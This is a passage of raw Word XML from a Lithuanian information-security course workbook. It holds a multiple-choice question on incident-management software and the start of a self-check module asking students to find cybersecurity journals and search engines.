        <w:t xml:space="preserve">Windows 10 </w:t>
      </w:r>
      <w:r w:rsidR="000559F1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nestringa</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724E29BB" w14:textId="696CAEBD" w:rsidR="0B4A386B" w:rsidRPr="005A5C28" w:rsidRDefault="0B4A386B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226FD72E" w14:textId="47CE3279" w:rsidR="009859B1" w:rsidRPr="005A5C28" w:rsidRDefault="1EEB3969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidR="009722F1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="1EF02B7C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>urios</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> iš išvardintų sistemų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1EF02B7C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>skirtos incidentų valdymui?</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A5EB58" w14:textId="2D24D9C0" w:rsidR="3D05CA6F" w:rsidRPr="005A5C28" w:rsidRDefault="1EF02B7C"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 xml:space="preserve">A) </w:t>
      </w:r>
      <w:r w:rsidR="2F5D88CC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="2B54F190" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>icrosoft System Center Service Manager</w:t>
      </w:r>
      <w:r w:rsidR="616576F9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="2B54F190" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> BMC Remedy</w:t>
      </w:r>
      <w:r w:rsidR="72E535C1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="2B54F190" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> HP Service </w:t>
      </w:r>
      <w:r w:rsidR="3BBA37DB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Center</w:t>
      </w:r>
      <w:r w:rsidR="7A0B213E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5BE7CC" w14:textId="7A07840D" w:rsidR="5758441C" w:rsidRPr="005A5C28" w:rsidRDefault="17409A9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 xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidR="076B4843" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NBC System Sevice Manager. NCC Remedy. Avanger IT Service Managamen Software</w:t>
      </w:r>
      <w:r w:rsidR="3C6A3450" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B72B3B7" w14:textId="67F26144" w:rsidR="76B1CF50" w:rsidRPr="005A5C28" w:rsidRDefault="076B4843"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C) IBM Remedy</w:t>
      </w:r>
      <w:r w:rsidR="09BE3CB0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Dell System Service Manager. </w:t>
      </w:r>
      <w:r w:rsidR="34F1D98C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>HP Service Center.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C6580" w14:textId="77777777" w:rsidR="0047487C" w:rsidRPr="005A5C28" w:rsidRDefault="0047487C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E454688" w14:textId="60C8372E" w:rsidR="00AF11F0" w:rsidRPr="005A5C28" w:rsidRDefault="00AF11F0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD77F7A" w14:textId="4B977953" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Informacijos saugumo valdymas“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274FEB15" w14:textId="77777777" w:rsidR="00875323" w:rsidRPr="005A5C28" w:rsidRDefault="00875323" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60927FB0" w14:textId="60C8372E" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">1 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>INFORMACIJOS PAIEŠKA. RESURSŲ NAUDOJIMAS</w:t>
      </w:r>
      <w:r w:rsidR="008A16CC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005509F3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SAVIKONTROLĖS UŽDUOTYS IR KLAUSIMAI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E6C1F0" w14:textId="474AE405" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Raštu a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tsaky</w:t>
      </w:r>
      <w:r w:rsidR="000D73E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į pateiktus klausimus, pateik</w:t>
      </w:r>
      <w:r w:rsidR="000D73E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nuorod</w:t>
      </w:r>
      <w:r w:rsidR="000D73E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ekrano nuotrauk</w:t>
      </w:r>
      <w:r w:rsidR="000D73E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7B2E31" w14:textId="11B4B12D"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 xml:space="preserve">Internete suraskite bent tris </w:t>
      </w:r>
      <w:r w:rsidR="004E04F7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>internetines svetaines</w:t>
      </w:r>
      <w:r w:rsidR="004B1AD7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> – žurnalus (angl.</w:t>
      </w:r>
      <w:r w:rsidR="00300B8E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001204AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00300B8E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Journal of Cybersecurity)</w:t>
      </w:r>
      <w:r w:rsidR="000D73E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, kurie rašo </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>apie kibernetinę saugą</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateik</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ite </w:t>
      </w:r>
      <w:r w:rsidR="000D73E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nuorodas</w:t>
      </w:r>
      <w:r w:rsidR="00F837B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49725973" w14:textId="6F51915C"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 xml:space="preserve">Kokiu būdu radote </w:t>
      </w:r>
      <w:r w:rsidR="00077DAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>internetines svetaines</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> apie kibernetinę saugą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r w:rsidR="000D73E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(n</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>urodykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>paieškos svetainę,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">užrašykite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>raktinius žodžius</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ar </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kit</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00077DAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>informaciją</w:t>
      </w:r>
      <w:r w:rsidR="000D73E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015382BF" w14:textId="57D26A55"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Ar vis</w:t>
      </w:r>
      <w:r w:rsidR="00AD774D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> jūsų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rast</w:t>
      </w:r>
      <w:r w:rsidR="00077DAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nurodyt</w:t>
      </w:r>
      <w:r w:rsidR="00077DAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00077DAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>internetinės svetainės</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rašo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tik</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">apie </w:t>
      </w:r>
      <w:r w:rsidR="000237DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kibernetinę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> saugą? Jeigu ne,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>išvardinkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ir </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kitas</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00077DAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>šių internetinių svetainių</w:t>
      </w:r>
      <w:r w:rsidR="000D73E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> temas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFAE4A7" w14:textId="361263D4" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="000D73E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Internete s</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">uraskite penkias paieškos paslaugas (angl. </w:t>
      </w:r>
      <w:r w:rsidR="00D610DD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>search engines), kuri</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>omis</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iki šiol</w:t>
      </w:r>
